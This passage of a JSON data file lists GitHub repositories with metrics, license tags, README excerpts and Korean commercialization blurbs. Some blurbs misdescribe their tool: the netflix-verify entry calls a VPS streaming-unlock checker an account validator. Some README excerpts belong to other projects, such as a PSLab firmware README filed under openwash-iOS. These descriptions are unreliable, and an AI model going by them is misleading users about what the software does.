[product page](https://trufflesecurity.com/trufflehog?gclid=CjwKCAjwouexBhAuEiwAtW_Zx5IW87JNj97Ci7heFnA5ar6-DuNzT2Y5nIl9DuZ-FOUqx","composite_score":0.2291,"license_safety_tag":"restricted"},{"name":"sjlleo/netflix-verify","github_url":"https://github.com/sjlleo/netflix-verify","stars":16,"language":"Go","license":"GPL-3.0","abandonment_months":11,"description":"# Netflix Verify 보물지도\n\n## 왜 보물인가\n넷플릭스 구독 계정이 실제로 유효한지 빠르게 확인할 수 있는 도구로, 계정 공유 적발이나 가입자 검증이 필요한 비즈니스에서 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **계정 공유 감지 서비스**: 넷플릭스 구독자 검증 플랫폼으로 운영하며 월 수수료 수집\n2. **콘텐츠 배포 플랫폼","readme_excerpt":"# NETFLIX-VERIFY\n\n最新版本: `v3.0-stable`\n\n流媒体NetFlix解锁检测脚本，使用Go语言编写。\n\n在VPS网络正常的情况下，哪怕是双栈网络也可在几秒内快速完成IPv4/IPv6的NF解锁情况判断。\n\n## 其他常见流媒体脚本链接\n\n可以试试 [@lmc999](https://github.com/lmc999) 的全能脚本，基本包含所有你能用到的流媒体了\n\nhttps://github.com/lmc999/RegionRestrictionCheck\n\n其他，之前学 Go 的时候随便写写的，~~现在再回去看想钻到洞里去~~\n\n~~DisneyPlus 解锁检测： https://github.com/sjlleo/VerifyDisneyPlus~~\n\n~~Youtube 缓存节点、地域信息检测：https://github.com/sjlleo/TubeCheck~~\n\n## 新特性\n\n**2022/05/21**\n\n添加`custom`影片检测支持，发布 `v3.0` 第一个稳定版\n\n**2022/05/20**\n\n重构`verify`、`util`、`printer` module，引入`goroutine`并发机制，提升运行效率。\n\n一年前，我在学习`Golang`的时候以研究为目的完成了这个项目，现在是时候抛弃包袱，完整重构了。\n\n## 编译脚本\n\n编译脚本来自于 [@missuo](https://github.com/missuo) 同学的修改版，在从特表感谢~\n\n## 指定网卡出口测试\n\n感谢 @caobug\n\n有些时候，我们使用了`Warp`或者是其他隧道网卡工具的时候，设置的路由表默认不通过他们上网\n\n在这种情况下，如果我们依旧想要测试该网卡出口是否支持解锁NetFlix，可以选择指定网卡IP进行测试\n\n在终端输入`ip a`，查看您想测试的网卡IP，然后加入参数 `-address` + 您的网卡IP地址即可，具体可看下图\n\n![图片](https://user-images.githubusercontent.com/13616352/169537511-8a10c9d2-3f4c-438a-b20a-8e5e31464259.png)\n\n\n## 鸣谢\n\n1. 感谢 [@CoiaPrant](https","composite_score":0.2291,"license_safety_tag":"restricted"},{"name":"StylishThemes/GitHub-Dark","github_url":"https://github.com/StylishThemes/GitHub-Dark","stars":8,"language":"CSS","license":"BSD-2-Clause","abandonment_months":0,"description":"","readme_excerpt":"<p align=\"center\">\n  <img alt=\"githubdark-logo\" src=\"https://cdn.jsdelivr.net/gh/StylishThemes/logos@master/github.dark/githubdark-mini.svg\" width=\"580\">\n  <br>\n  <a href=\"https://github.com/StylishThemes/GitHub-Dark/tags\">\n    <img src=\"https://img.shields.io/github/tag/StylishThemes/GitHub-Dark.svg?label=version&style=flat\" alt=\"Version\">\n  </a>\n  <a href=\"https://github.com/StylishThemes/GitHub-Dark/stargazers\">\n    <img src=\"https://img.shields.io/github/stars/StylishThemes/GitHub-Dark.svg?style=flat\" alt=\"Stars\">\n  </a>\n  <a href=\"https://github.com/StylishThemes/GitHub-Dark/network\">\n    <img src=\"https://img.shields.io/github/forks/StylishThemes/GitHub-Dark.svg?style=flat\" alt=\"Forks\">\n  </a>\n  <a href=\"https://david-dm.org/StylishThemes/GitHub-Dark?type=dev\">\n    <img src=\"https://img.shields.io/david/dev/StylishThemes/GitHub-Dark.svg?label=devDependencies&style=flat\" alt=\"devDependencies\">\n  </a>\n  <a href=\"https://gitter.im/StylishThemes/GitHub-Dark\">\n    <img src=\"https://im","composite_score":0.229,"license_safety_tag":"safe"},{"name":"FarazzShaikh/glNoise","github_url":"https://github.com/FarazzShaikh/glNoise","stars":6,"language":"GLSL","license":"MIT","abandonment_months":11,"description":"# glNoise 상용화 분석\n\n## 왜 보물인가\n복잡한 그래픽 효과를 간단하게 만들어주는 도구로, 게임이나 영상 제작자들이 자연스러운 배경을 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 플랫폼**: 인디 게임 개발자들이 구독하는 SaaS로 제공하여 월 이용료 수집\n2. **영상 편집 소프트웨어 플러그인**: 유튜브 크리에이터용","readme_excerpt":"<br />\n<p align=\"center\">\n    <a href=\"\">\n        <img src=\"./Assets/logo.png\" alt=\"Logo\" width=\"300\" height=\"300\">\n    </a>\n\n  <h1 align=\"center\">gl-Noise</h1>\n  \n  <p align=\"center\">\n    A collection of GLSL noise functions for use with WebGL with an easy to use API.\n    <br />\n    <a href=\"https://farazzshaikh.github.io/glNoise/examples/index.html\">View Demo</a>\n    ·\n    <a href=\"https://github.com/FarazzShaikh/glNoise/issues/new\">Report Bug</a>\n    ·\n    <a href=\"https://farazzshaikh.github.io/glNoise/\">API Docs</a>\n  </p>\n  <p align=\"center\">\n    <a href=\"https://www.npmjs.com/package/gl-noise\"><img align=\"center\" src=\"https://img.shields.io/npm/v/gl-noise?color=cc3534&style=for-the-badge\" /></a>\n  </p>\n</p>\n\n> NOTE: gl-noise is being rebuilt. The current API sucks but it does work. Keep and eye out for the new release. You can support [my sponsors page](https://github.com/sponsors/FarazzShaikh) to accelerate its progress.\n> For now, please import from `gl-noise/build/glNoise.m` ","composite_score":0.2288,"license_safety_tag":"safe"},{"name":"laravel/telescope","github_url":"https://github.com/laravel/telescope","stars":6,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Laravel Telescope 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션 개발 시 발생하는 문제를 빠르게 찾고 해결할 수 있는 디버깅 도구로, 개발자의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 업무 관리 도구(프로젝트 관리, CRM 등)에 내장하여 사용자 문제 발생 시 실시간 진단 기능","readme_excerpt":"<p align=\"center\"><img width=\"391\" height=\"83\" src=\"/art/logo.svg\" alt=\"Logo Laravel Telescope\"></p>\n\n<p align=\"center\">\n<a href=\"https://github.com/laravel/telescope/actions\"><img src=\"https://github.com/laravel/telescope/workflows/tests/badge.svg\" alt=\"Build Status\"></a>\n<a href=\"https://packagist.org/packages/laravel/telescope\"><img src=\"https://img.shields.io/packagist/dt/laravel/telescope\" alt=\"Total Downloads\"></a>\n<a href=\"https://packagist.org/packages/laravel/telescope\"><img src=\"https://img.shields.io/packagist/v/laravel/telescope\" alt=\"Latest Stable Version\"></a>\n<a href=\"https://packagist.org/packages/laravel/telescope\"><img src=\"https://img.shields.io/packagist/l/laravel/telescope\" alt=\"License\"></a>\n</p>\n\n## Introduction\n\nLaravel Telescope is an elegant debug assistant for the Laravel framework. Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled","composite_score":0.2279,"license_safety_tag":"safe"},{"name":"HyNetwork/hysteria","github_url":"https://github.com/HyNetwork/hysteria","stars":7,"language":"Go","license":"MIT","abandonment_months":0,"description":"# HyNetwork/hysteria 상업화 분석\n\n## 왜 보물인가\n인터넷 연결을 더 빠르고 안정적으로 만드는 기술로, 전 세계 네트워크 서비스 업체들이 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **VPN/프록시 SaaS 서비스**: 개인 사용자와 기업이 구독하는 보안 인터넷 연결 서비스로 월정액 모델 운영\n2. **기업 내부 네","readme_excerpt":"# ![Hysteria 2](logo.svg)\n\n[![License][1]][2] [![Release][3]][4] [![Telegram][5]][6] [![Discussions][7]][8]\n\n[1]: https://img.shields.io/badge/license-MIT-blue\n[2]: LICENSE.md\n[3]: https://img.shields.io/github/v/release/apernet/hysteria?style=flat-square\n[4]: https://github.com/apernet/hysteria/releases\n[5]: https://img.shields.io/badge/chat-Telegram-blue?style=flat-square\n[6]: https://t.me/hysteria_github\n[7]: https://img.shields.io/github/discussions/apernet/hysteria?style=flat-square\n[8]: https://github.com/apernet/hysteria/discussions\n\n<h2 style=\"text-align: center;\">Hysteria is a powerful, lightning fast and censorship resistant proxy.</h2>\n\n### [Get Started](https://v2.hysteria.network/)\n\n### [中文文档](https://v2.hysteria.network/zh/)\n\n### [Hysteria 1.x (legacy)](https://v1.hysteria.network/)\n\n---\n\n<div class=\"feature-grid\">\n  <div>\n    <h3>🛠️ Jack of all trades</h3>\n    <p>Wide range of modes including SOCKS5, HTTP Proxy, TCP/UDP Forwarding, Linux TProxy, TUN - with more features ","composite_score":0.2278,"license_safety_tag":"safe"},{"name":"dbcli/mycli","github_url":"https://github.com/dbcli/mycli","stars":6,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"# dbcli/mycli 상용화 분석\n\n## 왜 보물인가\n데이터베이스를 일반 텍스트 편집기처럼 쉽게 다룰 수 있게 만든 도구로, 비개발자도 회사 데이터를 직접 조회하고 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소기업 대상 \"누구나 쓰는 데이터 조회 플랫폼\" - 엑셀 대신 실시간 회사 데이터에 접근\n2. **내부 업무","readme_excerpt":"# mycli\n\n[![Build Status](https://github.com/dbcli/mycli/workflows/mycli/badge.svg)](https://github.com/dbcli/mycli/actions?query=workflow%3Amycli)\n\nA command line client for MySQL that can do auto-completion and syntax highlighting.\n\nHomepage: [https://mycli.net](https://mycli.net)\nDocumentation: [https://mycli.net/docs](https://mycli.net/docs)\n\n![Completion](doc/screenshots/tables.png)\n![CompletionGif](doc/screenshots/main.gif)\n\nPostgres Equivalent: [https://pgcli.com](https://pgcli.com)\n\nQuick Start\n-----------\n\nIf you already know how to install Python packages, then you can install it via `pip`:\n\nYou might need sudo on Linux.\n\n```bash\npip install -U 'mycli[all]'\n```\n\nor\n\n```bash\nbrew update && brew install mycli  # Only on macOS\n```\n\nor\n\n```bash\nsudo apt-get install mycli  # Only on Debian or Ubuntu\n```\n\n### Usage\n\nSee\n\n```bash\nmycli --help\n```\n\nFeatures\n--------\n\n`mycli` is written using [prompt_toolkit](https://github.com/jonathanslenders/python-prompt-toolkit/).\n\n* Auto-complet","composite_score":0.2278,"license_safety_tag":"safe"},{"name":"ruanyf/es6tutorial","github_url":"https://github.com/ruanyf/es6tutorial","stars":39,"language":"JavaScript","license":"NOASSERTION","abandonment_months":2,"description":"# ES6 튜토리얼 (ruanyf/es6tutorial) 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필수적인 자바스크립트라는 프로그래밍 언어를 쉽게 배울 수 있는 완벽한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 코딩 입문자들을 위한 구독형 강의 서비스로 운영\n2. **기업 직원 교육**: IT회사들의 신입 직원 온보","readme_excerpt":"# ES6 入门教程\n\n- [官方镜像](https://wangdoc.com/es6/)\n- [JavaScript 教程](https://wangdoc.com/javascript)\n- [TypeScript 教程](https://wangdoc.com/typescript)\n\n《ECMAScript 6 入门教程》是一本开源的 JavaScript 语言教程，全面介绍 ECMAScript 6 新引入的语法特性。\n\n[![cover](images/cover_thumbnail_3rd.jpg)](images/cover-3rd.jpg)\n\n本书覆盖 ES6 与上一个版本 ES5 的所有不同之处，对涉及的语法知识给予详细介绍，并给出大量简洁易懂的示例代码。\n\n本书为中级难度，适合已经掌握 ES5 的读者，用来了解这门语言的最新发展；也可当作参考手册，查寻新增的语法点。如果你是 JavaScript 语言的初学者，建议先学完[《JavaScript 语言教程》](https://wangdoc.com/javascript/)，再来看本书。\n\n全书已由电子工业出版社出版，2017年9月推出了第三版，书名为《ES6 标准入门》。纸版内容截止到出版时，网站内容一直在修订。\n\n- [淘宝](https://s.taobao.com/search?q=ES6%E6%A0%87%E5%87%86%E5%85%A5%E9%97%A8+%E7%AC%AC3%E7%89%88)\n- [京东](https://search.jd.com/Search?keyword=ES6%E6%A0%87%E5%87%86%E5%85%A5%E9%97%A8%20%E7%AC%AC3%E7%89%88&enc=utf-8&wq=ES6%E6%A0%87%E5%87%86%E5%85%A5%E9%97%A8%20%E7%AC%AC3%E7%89%88)\n- [当当](https://product.dangdang.com/25156888.html)\n\n### 版权许可\n\n本书采用“保持署名—非商用”创意共享4.0许可证。\n\n只要保持原作者署名和非商用，您可以自由地阅读、分享、修改本书。\n\n详细的法律条文请参见[创意共享](http://creativecommons.org/","composite_score":0.2275,"license_safety_tag":"unknown"},{"name":"akaunting/money","github_url":"https://github.com/akaunting/money","stars":22,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# akaunting/money 상용화 분석\n\n## 왜 보물인가\n복잡한 회계 처리를 간단하게 만드는 오픈소스 도구로, 누구나 자유롭게 개선하고 판매할 수 있는 법적 기반을 갖추고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소상공인 대상 월간 청구 자동화 플랫폼으로 운영\n- **내부 업무 도구**: 중소기업의 경비 관리 및 송금 추적 ","readme_excerpt":"# Currency formatting and conversion package for Laravel\n\n![Downloads](https://img.shields.io/packagist/dt/akaunting/laravel-money)\n![Tests](https://img.shields.io/github/actions/workflow/status/akaunting/laravel-money/tests.yml?label=tests)\n[![StyleCI](https://github.styleci.io/repos/112121508/shield?style=flat&branch=master)](https://styleci.io/repos/112121508)\n[![License](https://img.shields.io/github/license/akaunting/laravel-money)](LICENSE.md)\n\nThis package intends to provide tools for formatting and conversion of monetary values in an easy, yet powerful way for Laravel projects.\n\n### Why not use the `moneyphp` package?\n\nBecause it uses the `intl` extension for number formatting. `intl` extension isn't present by default on PHP installs and can give [different results](http://moneyphp.org/en/latest/features/formatting.html#intl-formatter) in different servers.\n\n## Getting Started\n\n### 1. Install\n\nRun the following command:\n\n```bash\ncomposer require akaunting/laravel-money\n```\n\n##","composite_score":0.2274,"license_safety_tag":"safe"},{"name":"etsy/statsd","github_url":"https://github.com/etsy/statsd","stars":7,"language":"JavaScript","license":"mit","abandonment_months":12,"description":"# etsy/statsd 분석 보고서\n\n## 왜 보물인가\n웹서비스의 성능 문제를 실시간으로 감지하고 추적할 수 있는 핵심 인프라 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 모니터링 SaaS**: 기업들의 서버 상태를 24시간 감시하고 문제 발생 시 자동 알림을 보내는 구독형 서비스\n2. **내부 IT 대시보드**: 대규모 회사의 전산팀이 수","readme_excerpt":"# StatsD [![Join the chat at https://gitter.im/statsd/statsd](https://badges.gitter.im/statsd/statsd.svg)](https://gitter.im/statsd/statsd?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) [![Docker Pulls](https://img.shields.io/docker/pulls/statsd/statsd)](https://hub.docker.com/r/statsd/statsd)\n\nA network daemon that runs on the [Node.js][node] platform and\nlistens for statistics, like counters and timers, sent over [UDP][udp] or\n[TCP][tcp] and sends aggregates to one or more pluggable backend services (e.g.,\n[Graphite][graphite]).\n\n## Key Concepts\n\n* *buckets*\n\n  Each stat is in its own \"bucket\". They are not predefined anywhere. Buckets\ncan be named anything that will translate to Graphite (periods make folders,\netc)\n\n* *values*\n\n  Each stat will have a value. How it is interpreted depends on modifiers. In\ngeneral values should be integers.\n\n* *flush*\n\n  After the flush interval timeout (defined by `config.flushInterval`,\n  default 10 seconds), stats are aggregated and sent ","composite_score":0.2269,"license_safety_tag":"safe"},{"name":"klaussinani/signale","github_url":"https://github.com/klaussinani/signale","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":2,"description":"# Signale 저장소 분석\n\n## 왜 보물인가\n프로그램이 사용자에게 정보를 보여주고 알려줄 때 예쁘고 정리된 형태로 표시해주는 도구로, 개발자들이 자주 필요로 하는 기본적이면서도 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 데이터 분석 도구에서 분석 결과, 경고, 성공 메시지를 사용자 친화적으로 표시\n2","readme_excerpt":"<h1 align=\"center\">\n  Signale\n</h1>\n\n<h4 align=\"center\">\n  Highly configurable logging library\n</h4>\n\n<div align=\"center\">\n  <img alt=\"Header\" src=\"media/header.png\" width=\"88%\">\n</div>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/signale\">\n    <img alt=\"NPM Downloads\" src=\"https://img.shields.io/npm/dt/signale.svg\">\n  </a>\n</p>\n\n<div align=\"center\">\n  <br>\n  <sup><b>Sponsored by:</b></sup>\n  <br>\n  <a href=\"https://betterstack.com\">\n    <div>\n      <img src=\"https://github.com/Seldaek/monolog/assets/183678/7de58ce0-2fa2-45c0-b3e8-e60cebb3c4cf\" width=\"200\" alt=\"Better Stack\">\n    </div>\n    <sup>\n      Spot, Resolve, and Prevent Downtime.\n    </sup>\n  </a>\n</div>\n\n## Description\n\nHackable and configurable to the core, signale can be used for logging purposes, status reporting, as well as for handling the output rendering process of other node modules and applications.\n\nRead this document in: [Albanian - Shqip](https://github.com/klaudiosinani/signale/blob/master/docs/re","composite_score":0.2268,"license_safety_tag":"safe"},{"name":"onurakpolat/awesome-bigdata","github_url":"https://github.com/onurakpolat/awesome-bigdata","stars":5,"language":"","license":"mit","abandonment_months":4,"description":"# awesome-bigdata 저장소 분석\n\n## 왜 보물인가\n기업들이 방대한 데이터를 효율적으로 다루기 위해 필요한 도구와 서비스들을 한곳에 모아놓은 '지도' 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업 대상 \"데이터 분석 상담 플랫폼\" - 이 저장소의 도구 목록을 기반으로 기업에 맞는 솔루션을 추천해주는 서비스","readme_excerpt":"# Awesome Big Data\n\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\nA curated list of awesome big data frameworks, resources and other awesomeness. Inspired by [awesome-php](https://github.com/ziadoz/awesome-php), [awesome-python](https://github.com/vinta/awesome-python), [awesome-ruby](https://github.com/Sdogruyol/awesome-ruby), [hadoopecosystemtable](http://hadoopecosystemtable.github.io/) & [big-data](http://usefulstuff.io/big-data/).\n\nYour contributions are always welcome!\n\n- [Awesome Big Data](#awesome-big-data)\n  - [RDBMS](#rdbms)\n  - [Frameworks](#frameworks)\n  - [Distributed Programming](#distributed-programming)\n  - [Distributed Filesystem](#distributed-filesystem)\n  - [Distributed Index](#distributed-index)\n  - [Document Data Model](#document-data-model)\n  - [Key Map Data Model](#key-map-data-model)\n  - [Key-value Data Model](#key-value-data-model)\n  - [Graph Data Mode","composite_score":0.2267,"license_safety_tag":"safe"},{"name":"amazeui/amazeui","github_url":"https://github.com/amazeui/amazeui","stars":10,"language":"HTML","license":"NOASSERTION","abandonment_months":19,"description":"# Amazeui 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 빠르게 만들기 위한 디자인 틀 모음으로, 개발자가 처음부터 다시 만드는 수고를 덜어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 관리자 페이지나 대시보드를 빠르게 구축할 때 기본 디자인으로 활용\n2. **내부 업무 도구**: 회사 직원들이 사용하는 보고서 작성 ","readme_excerpt":"<h1><a href=\"http://amazeui.org/\" title=\"Amaze UI 官网\"><img style=\"float: left\" width=\"240\" src=\"https://raw.githubusercontent.com/allmobilize/amazeui/master/vendor/amazeui/amazeui-b.png\" alt=\"Amaze UI Logo\"/></a></h1>\n\n[![Bower version](https://img.shields.io/bower/v/amazeui.svg?style=flat-square)](https://github.com/amazeui/amazeui)\n[![NPM version](https://img.shields.io/npm/v/amazeui.svg?style=flat-square)](https://www.npmjs.com/package/amazeui)\n[![Build Status](https://img.shields.io/travis/amazeui/amazeui.svg?style=flat-square)](https://travis-ci.org/amazeui/amazeui)\n[![Dependency Status](https://img.shields.io/david/amazeui/amazeui.svg?style=flat-square)](https://david-dm.org/amazeui/amazeui)\n[![devDependency Status](https://img.shields.io/david/dev/amazeui/amazeui.svg?style=flat-square)](https://david-dm.org/amazeui/amazeui#info=devDependencies)\n\nAmaze UI 是基于社区开源项目构建的一个跨屏前端框架。\n\n### [Docs in English](http://amazeui.github.io/docs/en/)\n\n__[README in English](README.en.md)__\n\n### [R","composite_score":0.2264,"license_safety_tag":"unknown"},{"name":"fashiontec/openwash-iOS","github_url":"https://github.com/fashiontec/openwash-iOS","stars":12,"language":"C++","license":"Apache-2.0","abandonment_months":2,"description":"# OpenWash iOS 저장소 분석\n\n## 왜 보물인가\n세탁기 사용을 스마트폰으로 관리하고 예약할 수 있게 해주는 기술로, 공동주택이나 세탁소의 운영 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 아파트/기숙사 세탁기 예약 앱 (SaaS)**\n- 입주민들이 스마트폰으로 세탁기 사용 시간을 미리 예약하고, 관리사무소는 기계 사용률을","readme_excerpt":"# PSLab ESP01 Firmware\nThis repository contains firmware for the ESP8266 ESP-01 chip to be used for implementing wireless connectivity with the [Pocket Science Lab (PSLab)](https://pslab.io/) open hardware platform.\n\n## Pocket Science Lab\n\nThe PSLab provides an array of test and measurement instruments for doing\nscience and engineering experiments. Its built-in instruments include an\noscilloscope, a waveform generator, a frequency counter, programmable voltage\nand current sources, and a logic analyzer. The PSLab also has UART, I2C, and SPI\nbuses, via which external devices can be connected and controlled.\n\nThe PSLab is a fully open source device, and FOSSASIA provides a complete hardware\nand software stack under open source licenses:\n\n- [Hardware](https://github.com/fossasia/pslab-hardware)\n- [Bootloader](https://github.com/fossasia/pslab-bootloader)\n- [Firmware](https://github.com/fossasia/pslab-firmware)\n- [Python library](https://github.com/fossasia/pslab-python)\n- [Graphical deskto","composite_score":0.2263,"license_safety_tag":"safe"},{"name":"klauscfhq/hyper-pokemon","github_url":"https://github.com/klauscfhq/hyper-pokemon","stars":18,"language":"JavaScript","license":"MIT","abandonment_months":2,"description":"# hyper-pokemon 프로젝트 분석\n\n## 왜 보물인가\n포켓몬 게임의 데이터를 쉽게 활용할 수 있게 정리한 오픈소스로, 게임 개발자나 팬 프로젝트 제작자들이 즉시 사용할 수 있는 완성된 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **포켓몬 팬게임 플랫폼**: 온라인 포켓몬 배틀이나 도감 앱을 SaaS로 제공하여 월 구독료 수익화\n2. **게임 개발","readme_excerpt":"<div align=\"center\">\n  <img src=\"media/logo.png\" width=\"28%\">\n</div>\n\n<h4 align=\"center\">\n  Hyper Pokemon\n</h4>\n\n<h4 align=\"center\">\n  Tailor-made Pokémon themes for your Hyper terminal\n</h4>\n\n<div align=\"center\">\n  <img src=\"media/screen.png\" alt=\"Hyper Pokemon\" width=\"99%\">\n</div>\n\n<div align=\"center\">\n  <sup><b>Sponsored by:</b></sup>\n  <br>\n  <a href=\"https://betterstack.com\">\n    <div>\n      <img src=\"https://github.com/Seldaek/monolog/assets/183678/7de58ce0-2fa2-45c0-b3e8-e60cebb3c4cf\" width=\"200\" alt=\"Better Stack\">\n    </div>\n    <sup>\n      Spot, Resolve, and Prevent Downtime.\n    </sup>\n  </a>\n</div>\n\n## Contents\n\n- [Description](#description)\n- [Install](#install)\n- [Usage](#usage)\n- [Options](#options)\n- [Available Themes](#available-themes)\n- [Related](#related)\n- [Team](#team)\n- [Sponsors](#sponsors)\n- [License](#license)\n\n## Description\n\nMade for Pokémon enthusiasts by Pokémon enthusiasts.\n\nAll of the wonderful Pokémon backgrounds were created by the amazing [Teej/TopHat","composite_score":0.2263,"license_safety_tag":"safe"},{"name":"symfony/flex","github_url":"https://github.com/symfony/flex","stars":5,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# Symfony Flex 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 복잡한 설정 없이 빠르게 프로젝트를 시작할 수 있도록 도와주는 자동화 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 협업 도구나 프로젝트 관리 플랫폼의 백엔드 개발 시간을 50% 단축\n2. **내부 업무 도구**: 회사 직원들만 사용하는 ","readme_excerpt":"<p align=\"center\"><a href=\"https://symfony.com\" target=\"_blank\">\n    <img src=\"https://symfony.com/logos/symfony_black_02.svg\">\n</a></p>\n\n[Symfony Flex][1] helps developers create [Symfony][2] applications, from the most\nsimple micro-style projects to the more complex ones with dozens of\ndependencies.\n\n[1]: https://symfony.com/doc/current/setup/flex.html\n[2]: https://symfony.com\n","composite_score":0.226,"license_safety_tag":"safe"},{"name":"houtianze/bypy","github_url":"https://github.com/houtianze/bypy","stars":5,"language":"Python","license":"mit","abandonment_months":14,"description":"# bypy 저장소 분석 보고서\n\n## 왜 보물인가\n클라우드 저장소(바이두 클라우드)를 프로그래밍 없이 자동으로 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 사용자를 위한 자동 백업 및 파일 동기화 웹 서비스\n2. **내부 업무 도구**: 기업의 대량 파일을 바이두 클라우드에 자동으로 정리하고 배포하는 시스템\n","readme_excerpt":"bypy - Python client for Baidu Yun (Personal Cloud Storage) 百度云/百度网盘Python客户端\n====================================================================================\n\n[![alt text](https://img.shields.io/pypi/v/bypy.svg \"PyPi Version\")](https://pypi.python.org/pypi/bypy)\n[![alt text](https://img.shields.io/pypi/dm/bypy.svg \"PyPi Downloads\")](https://pypi.python.org/pypi/bypy)\n[![alt text](https://travis-ci.org/houtianze/bypy.svg \"Build status\")](https://travis-ci.org/houtianze/bypy)\n[![Coverage Status](https://coveralls.io/repos/houtianze/bypy/badge.svg?branch=master&service=github)](https://coveralls.io/github/houtianze/bypy?branch=master)\n[![Code Climate](https://codeclimate.com/github/houtianze/bypy/badges/gpa.svg)](https://codeclimate.com/github/houtianze/bypy)\n[![Join the chat at https://gitter.im/houtianze/bypy](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/houtianze/bypy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n[![Stand With Ukraine]","composite_score":0.2259,"license_safety_tag":"safe"},{"name":"mikalhart/ESP32-OTA-Pull","github_url":"https://github.com/mikalhart/ESP32-OTA-Pull","stars":99,"language":"C++","license":"MIT","abandonment_months":2,"description":"# ESP32-OTA-Pull 상용화 분석\n\n## 왜 보물인가\nESP32 칩이 들어간 IoT 기기들을 인터넷으로 원격에서 자동으로 업데이트할 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 기기 제조사**: 스마트 조명, 온습도계, 스마트락 등 가정용 IoT 제품의 자동 업데이트 서비스\n2. **산업용 IoT 관리 플랫폼**:","readme_excerpt":"# ESP32-OTA-Pull\nAn Arduino library to facilitate simple ESP32 \"**pull**\"-based OTA updates\n\n## \"Pull\" Design\nThere are a number of good Arduino libraries out there for OTA (\"Over The Air\") firmware updates.  Example: [ArduinoOTA](https://github.com/jandrassy/ArduinoOTA) and [AsyncElegantOTA](https://github.com/ayushsharma82/AsyncElegantOTA).  These libraries use a \"push\" technology, wherein you identify a target device you'd like to update and push/upload a new firmware to it.\n\n[ESP32-OTA-Pull](https://github.com/mikalhart/ESP32-OTA-Pull) uses a different, \"pull\", strategy. In this scenario, you post new firmware image(s) to a webserver, and your WiFi-enabled devices find the new images and update themselves. It scales. You don't have to target each device individually; as long as your devices can connect to WiFi, they can update themselves.\n\n## Setup\nWith ESP32-OTA-Pull, whenever you're ready to publish a new firmware for your device, you post two files to a webserver:\n- The new vers","composite_score":0.2258,"license_safety_tag":"safe"},{"name":"amusi/ICCV2021-Papers-with-Code","github_url":"https://github.com/amusi/ICCV2021-Papers-with-Code","stars":16,"language":"","license":"unknown","abandonment_months":11,"description":"# ICCV2021-Papers-with-Code 분석\n\n## 왜 보물인가\n세계 최고 수준의 컴퓨터 비전 학회(ICCV 2021)에 발표된 논문들을 실제 동작하는 코드와 함께 모아놓은 학습 자료로, 최신 AI 기술을 빠르게 습득할 수 있는 귀중한 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 이미지 분석 플랫폼 - 제품 품질","readme_excerpt":"# ICCV 2025 论文和开源项目合集(Papers with Code)\n\nICCV 2025 Accepance Rate of 24% = 2699 / 11239\n\n\n> 注1：欢迎各位大佬提交issue，分享ICCV 2025论文和开源项目！\n>\n> 注2：关于往年CV顶会论文以及其他优质CV论文和大盘点，详见： https://github.com/amusi/daily-paper-computer-vision\n>\n> - [CVPR 2025](https://github.com/amusi/CVPR2025-Papers-with-Code)\n> - [ECCV 2024](https://github.com/amusi/ECCV2024-Papers-with-Code)\n\n欢迎扫码加入【CVer学术交流群】，可以获取ICCV 2025等最前沿工作！这是最大的计算机视觉AI知识星球！每日更新，第一时间分享最新最前沿的计算机视觉、AIGC、扩散模型、多模态、深度学习、自动驾驶、医疗影像和遥感等方向的学习资料，快加入学起来！\n\n![](CVer学术交流群.png)\n\n# 【ICCV 2025 论文和开源代码目录】\n\n- [3DGS(Gaussian Splatting)](#3DGS)\n- [Agent)](#Agent)\n- [Avatars](#Avatars)\n- [Backbone](#Backbone)\n- [CLIP](#CLIP)\n- [Mamba](#Mamba)\n- [Embodied AI](#Embodied-AI)\n- [GAN](#GAN)\n- [GNN](#GNN)\n- [多模态大语言模型(MLLM)](#MLLM)\n- [大语言模型(LLM)](#LLM)\n- [世界模型(World Model)](#WM)\n- [OCR](#OCR)\n- [NeRF](#NeRF)\n- [DETR](#DETR)\n- [扩散模型(Diffusion Models)](#Diffusion)\n- [ReID(重识别)](#ReID)\n- [长尾分布(Long-Tail)](#Long-Tail)\n- [Vision Transformer](#Vision-Transformer)\n- 